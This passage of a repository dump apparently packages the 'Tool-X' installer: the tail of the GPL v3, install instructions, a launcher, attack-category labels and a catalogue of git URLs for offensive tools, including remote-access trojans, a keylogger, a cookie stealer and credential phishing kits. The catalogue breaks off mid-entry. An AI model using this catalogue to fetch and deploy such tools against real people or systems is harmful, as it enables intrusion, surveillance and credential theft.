rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /Tool X/README.md: -------------------------------------------------------------------------------- 1 |
2 |

3 | 4 | 5 | 6 |

7 | 8 | ----------------------------------------------------------------- 9 | ### Operating System Requirements 10 | 11 | Tool-X works on any of the following operating systems:
12 | • **Android** (Using the Termux App)
13 | • **Linux** (Debian Based Systems)
14 | • **Unix** 15 | 16 | ----------------------------------------------------------------- 17 | 18 | ### How to Install 19 | 20 | Open the terminal and type following commands. 21 | 22 | * `apt update` 23 | 24 | * `apt install git` 25 | 26 | * `git clone https://github.com/rajkumardusad/Tool-X.git` 27 | 28 | * `cd Tool-X` 29 | 30 | * `chmod +x install` 31 | 32 | * `sh install` if not work than use `./install` 33 | 34 | ----------------------------------------------------------------- -------------------------------------------------------------------------------- /Tool X/Tool-X.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from modules.menu import * 4 | 5 | if __name__=="__main__": 6 | try: 7 | main.menu() 8 | except KeyboardInterrupt: 9 | os.system("clear") 10 | logo.exit() 11 | -------------------------------------------------------------------------------- /Tool X/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Tool X/__init__.py -------------------------------------------------------------------------------- /Tool X/_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-cayman -------------------------------------------------------------------------------- /Tool X/core/Screenshot_2020-05-17-20-17-56.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Tool X/core/Screenshot_2020-05-17-20-17-56.png -------------------------------------------------------------------------------- /Tool X/core/Tool-X: -------------------------------------------------------------------------------- 1 | # Tool Name :- Tool-X 2 | # Author :- Rajkumar dusad 3 | # Date :- 1/11/2017 4 | 5 | if [ -d /data/data/com.termux/files/usr/etc ]; then 6 | conf_dir="/data/data/com.termux/files/usr/etc" 7 | elif [ -d /usr/etc ]; then 8 | conf_dir="/usr/etc" 9 | elif [ -d /etc ]; then 10 | conf_dir="/etc" 11 | fi 12 | 13 | if [ -e /usr/lib/sudo ]; then 14 | sudo python3 $conf_dir/Tool-X/Tool-X.py 15 | else 16 | python3 $conf_dir/Tool-X/Tool-X.py 17 | fi 18 | exit -------------------------------------------------------------------------------- /Tool X/core/cat.json: -------------------------------------------------------------------------------- 1 | { 2 | "information_gathering" : "Information Gathering", 3 | "vulnerability_scanner" : "Vulnerability Scanner", 4 | "exploitation_tools" : "Exploitation Tools", 5 | "wireless_testing" : "Wireless Testing", 6 | "forensics_tools" : "Forensics Tools", 7 | "web_hacking" : "Web Hacking", 8 | "stress_testing" : "Stress Testing", 9 | "sniffing_spoofing" : "Sniffing & Spoofing", 10 | "password_attack" : "Password Attacks", 11 | "maintaining_access" : "Maintaining Access", 12 | "ip_tracking" : "IP-Tracking tools", 13 | "programming_language" : "Programming Languages", 14 | "ddos" : "DDOS Attacks", 15 | "web_server" : "Web Server's", 16 | "termux_os" : "Termux OS" 17 | } 18 | -------------------------------------------------------------------------------- /Tool X/core/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "4nonimizer" : { 3 | "name" : "4nonimizer", 4 | "package_name" : "4nonimizer", 5 | "category" : [null], 6 | "url" : "https://github.com/Hackplayers/4nonimizer.git", 7 | "package_manager" : "git", 8 | "dependency" : ["git"] 9 | }, 10 | "A-Rat" : { 11 | "name" : "A-Rat", 12 | "package_name" : "A-Rat", 13 | "category" : ["exploitation_tools"], 14 | "url" : "https://github.com/Xi4u7/A-Rat.git", 15 | "package_manager" : "git", 16 | "dependency" : ["python","git"] 17 | }, 18 | "ADB-Toolkit" : { 19 | "name" : "ADB-Toolkit", 20 | "package_name" : "ADB-Toolkit", 21 | "category" : [null], 22 | "url" : "https://github.com/ASHWIN990/ADB-Toolkit.git", 23 | "package_manager" : "git", 24 | "dependency" : ["git"] 25 | }, 26 | "ATSCAN" : { 27 | "name" : "ATSCAN", 28 | "package_name" : "ATSCAN", 29 | "category" : ["exploitation_tools"], 30 | "url" : "https://github.com/AlisamTechnology/ATSCAN.git", 31 | "package_manager" : "git", 32 | "dependency" : ["git"] 33 | }, 34 | "AndroBugs_Framework" : { 35 | "name" : "AndroBugs_Framework", 36 | "package_name" : "AndroBugs_Framework", 37 | "category" : [null], 38 | "url" : "https://github.com/AndroBugs/AndroBugs_Framework.git", 39 | "package_manager" : "git", 40 | "dependency" : ["python","git"] 41 | }, 42 | "Androspy" : { 43 | "name" : "Androspy", 44 | "package_name" : "Androspy", 45 | "category" : [null], 46 | "url" : "https://github.com/TunisianEagles/Androspy.git", 47 | "package_manager" : "git", 48 | "dependency" : ["git"] 49 | }, 50 | "AutoPixieWps" : { 51 | "name" : "AutoPixieWps", 52 | "package_name" : "AutoPixieWps", 53 | "category" : [null], 54 | "url" : "https://github.com/nxxxu/AutoPixieWps.git", 55 | "package_manager" : "git", 56 | "dependency" : ["python","git"] 57 | }, 58 | "Automater" : { 59 | "name" : "Automater", 60 | "package_name" : "TekDefense-Automater", 61 | "category" : ["information_gathering"], 62 | "url" : "https://github.com/1aN0rmus/TekDefense-Automater.git", 63 | "package_manager" : "git", 64 | "dependency" : ["python","git"] 65 | }, 66 | "Auxscan" : { 67 | "name" : "Auxscan", 68 | "package_name" : "Auxscan", 69 | "category" : [null], 70 | "url" : "https://github.com/Gameye98/Auxscan.git", 71 | "package_manager" : "git", 72 | "dependency" : ["python","git"] 73 | }, 74 | "BAF" : { 75 | "name" : "BAF", 76 | "package_name" : "BAF", 77 | "category" : [null], 78 | "url" : "https://github.com/engMaher/BAF.git", 79 | "package_manager" : "git", 80 | "dependency" : ["python","git"] 81 | }, 82 | "BadMod" : { 83 | "name" : "BadMod", 84 | "package_name" : "BadMod", 85 | "category" : [null], 86 | "url" : "https://github.com/MrSqar-Ye/BadMod.git", 87 | "package_manager" : "git", 88 | "dependency" : ["php","git"] 89 | }, 90 | "BeeLogger" : { 91 | "name" : "BeeLogger", 92 | "package_name" : "BeeLogger", 93 | "category" : [null], 94 | "url" : "https://github.com/4w4k3/BeeLogger.git", 95 | "package_manager" : "git", 96 | "dependency" : ["python","git"] 97 | }, 98 | "Black-Hydra" : { 99 | "name" : "Black-Hydra", 100 | "package_name" : "Black-Hydra", 101 | "category" : [null], 102 | "url" : "https://github.com/Gameye98/Black-Hydra.git", 103 | "package_manager" : "git", 104 | "dependency" : ["python","git"] 105 | }, 106 | "Blazy" : { 107 | "name" : "Blazy", 108 | "package_name" : "Blazy", 109 | "category" : [null], 110 | "url" : "https://github.com/UltimateHackers/Blazy.git", 111 | "package_manager" : "git", 112 | "dependency" : ["python","git"] 113 | }, 114 | "Breacher" : { 115 | "name" : "Breacher", 116 | "package_name" : "Breacher", 117 | "category" : ["web_hacking"], 118 | "url" : "https://github.com/UltimateHackers/Breacher.git", 119 | "package_manager" : "git", 120 | "dependency" : ["python","git"] 121 | }, 122 | "Brutal" : { 123 | "name" : "Brutal", 124 | "package_name" : "Brutal", 125 | "category" : ["exploitation_tools"], 126 | "url" : "https://github.com/Screetsec/Brutal.git", 127 | "package_manager" : "git", 128 | "dependency" : ["git"] 129 | }, 130 | "BruteX" : { 131 | "name" : "BruteX", 132 | "package_name" : "BruteX", 133 | "category" : ["web_hacking"], 134 | "url" : "https://github.com/1N3/BruteX.git", 135 | "package_manager" : "git", 136 | "dependency" : ["python","git"] 137 | }, 138 | "CamHacker" : { 139 | "name" : "CamHacker", 140 | "package_name" : "CamHacker", 141 | "category" : ["sniffing_spoofing","information_gathering"], 142 | "url" : "https://github.com/KasRoudra/CamHacker.git", 143 | "package_manager" : "git", 144 | "dependency" : ["php","git","curl","wget","unzip"] 145 | }, 146 | "CHAOS" : { 147 | "name" : "CHAOS", 148 | "package_name" : "CHAOS", 149 | "category" : [null], 150 | "url" : "https://github.com/tiagorlampert/CHAOS.git", 151 | "package_manager" : "git", 152 | "dependency" : ["golang","git"] 153 | }, 154 | "CMSeeK" : { 155 | "name" : "CMSeeK", 156 | "package_name" : "CMSeeK", 157 | "category" : [null], 158 | "url" : "https://github.com/Tuhinshubhra/CMSeeK.git", 159 | "package_manager" : "git", 160 | "dependency" : ["python","git"] 161 | }, 162 | "CMSmap" : { 163 | "name" : "CMSmap", 164 | "package_name" : "CMSmap", 165 | "category" : ["information_gathering"], 166 | "url" : "https://github.com/Dionach/CMSmap.git", 167 | "package_manager" : "git", 168 | "dependency" : ["python","git"] 169 | }, 170 | "CeWL" : { 171 | "name" : "CeWL", 172 | "package_name" : "CeWL", 173 | "category" : ["password_attack"], 174 | "url" : "https://github.com/digininja/CeWL.git", 175 | "package_manager" : "git", 176 | "dependency" : ["ruby","git"] 177 | }, 178 | "Clickjacking-Tester" : { 179 | "name" : "Clickjacking-Tester", 180 | "package_name" : "Clickjacking-Tester", 181 | "category" : [null], 182 | "url" : "https://github.com/D4Vinci/Clickjacking-Tester.git", 183 | "package_manager" : "git", 184 | "dependency" : ["python","git"] 185 | }, 186 | "Cookie-stealer" : { 187 | "name" : "Cookie-stealer", 188 | "package_name" : "Cookie-stealer", 189 | "category" : [null], 190 | "url" : "https://github.com/Xyl2k/Cookie-stealer.git", 191 | "package_manager" : "git", 192 | "dependency" : ["php","git"] 193 | }, 194 | "CrawlBox" : { 195 | "name" : "CrawlBox", 196 | "package_name" : "CrawlBox", 197 | "category" : [null], 198 | "url" : "https://github.com/abaykan/CrawlBox.git", 199 | "package_manager" : "git", 200 | "dependency" : ["python","git"] 201 | }, 202 | "CredSniper" : { 203 | "name" : "CredSniper", 204 | "package_name" : "CredSniper", 205 | "category" : [null], 206 | "url" : "https://github.com/ustayready/CredSniper.git", 207 | "package_manager" : "git", 208 | "dependency" : ["python","git"] 209 | }, 210 | "Crips" : { 211 | "name" : "Crips", 212 | "package_name" : "Crips", 213 | "category" : ["information_gathering"], 214 | "url" : "https://github.com/Manisso/Crips.git", 215 | "package_manager" : "git", 216 | "dependency" : ["python","git"] 217 | }, 218 | "CyberScan" : { 219 | "name" : "CyberScan", 220 | "package_name" : "CyberScan", 221 | "category" : [null], 222 | "url" : "https://github.com/medbenali/CyberScan.git", 223 | "package_manager" : "git", 224 | "dependency" : ["python","git"] 225 | }, 226 | "D-TECT" : { 227 | "name" : "D-TECT", 228 | "package_name" : "D-TECT", 229 | "category" : ["information_gathering","vulnerability_scanner"], 230 | "url" : "https://github.com/shawarkhanethicalhacker/D-TECT.git", 231 | "package_manager" : "git", 232 | "dependency" : ["python","git"] 233 | }, 234 | "DHCPig" : { 235 | "name" : "DHCPig", 236 | "package_name" : "DHCPig", 237 | "category" : ["stress_testing"], 238 | "url" : "https://github.com/kamorin/DHCPig.git", 239 | "package_manager" : "git", 240 | "dependency" : ["python","git"] 241 | }, 242 | "DKMC" : { 243 | "name" : "DKMC", 244 | "package_name" : "DKMC", 245 | "category" : [null], 246 | "url" : "https://github.com/Mr-Un1k0d3r/DKMC.git", 247 | "package_manager" : "git", 248 | "dependency" : ["python","git"] 249 | }, 250 | "DSSS" : { 251 | "name" : "DSSS", 252 | "package_name" : "DSSS", 253 | "category" : ["vulnerability_scanner"], 254 | "url" : "https://github.com/stamparm/DSSS.git", 255 | "package_manager" : "git", 256 | "dependency" : ["python","git"] 257 | }, 258 | "DSVW" : { 259 | "name" : "DSVW", 260 | "package_name" : "DSVW", 261 | "category" : [null], 262 | "url" : "https://github.com/stamparm/DSVW.git", 263 | "package_manager" : "git", 264 | "dependency" : ["python","git"] 265 | }, 266 | "DSXS" : { 267 | "name" : "DSXS", 268 | "package_name" : "DSXS", 269 | "category" : [null], 270 | "url" : "https://github.com/stamparm/DSXS.git", 271 | "package_manager" : "git", 272 | "dependency" : ["python","git"] 273 | }, 274 | "Devploit" : { 275 | "name" : "Devploit", 276 | "package_name" : "Devploit", 277 | "category" : ["information_gathering"], 278 | "url" : "https://github.com/joker25000/Devploit.git", 279 | "package_manager" : "git", 280 | "dependency" : ["python","git"] 281 | }, 282 | "Dr0p1t-Framework" : { 283 | "name" : "Dr0p1t-Framework", 284 | "package_name" : "Dr0p1t-Framework", 285 | "category" : [null], 286 | "url" : "https://github.com/D4Vinci/Dr0p1t-Framework.git", 287 | "package_manager" : "git", 288 | "dependency" : ["python","git"] 289 | }, 290 | "Dracnmap" : { 291 | "name" : "Dracnmap", 292 | "package_name" : "Dracnmap", 293 | "category" : [null], 294 | "url" : "https://github.com/Screetsec/Dracnmap.git", 295 | "package_manager" : "git", 296 | "dependency" : ["git"] 297 | }, 298 | "EagleEye" : { 299 | "name" : "EagleEye", 300 | "package_name" : "EagleEye", 301 | "category" : [null], 302 | "url" : "https://github.com/ThoughtfulDev/EagleEye.git", 303 | "package_manager" : "git", 304 | "dependency" : ["python","git"] 305 | }, 306 | "EasY_HaCk" : { 307 | "name" : "EasY_HaCk", 308 | "package_name" : "EasY_HaCk", 309 | "category" : [null], 310 | "url" : "https://github.com/sabri-zaki/EasY_HaCk.git", 311 | "package_manager" : "git", 312 | "dependency" : ["python","git"] 313 | }, 314 | "EggShell" : { 315 | "name" : "EggShell", 316 | "package_name" : 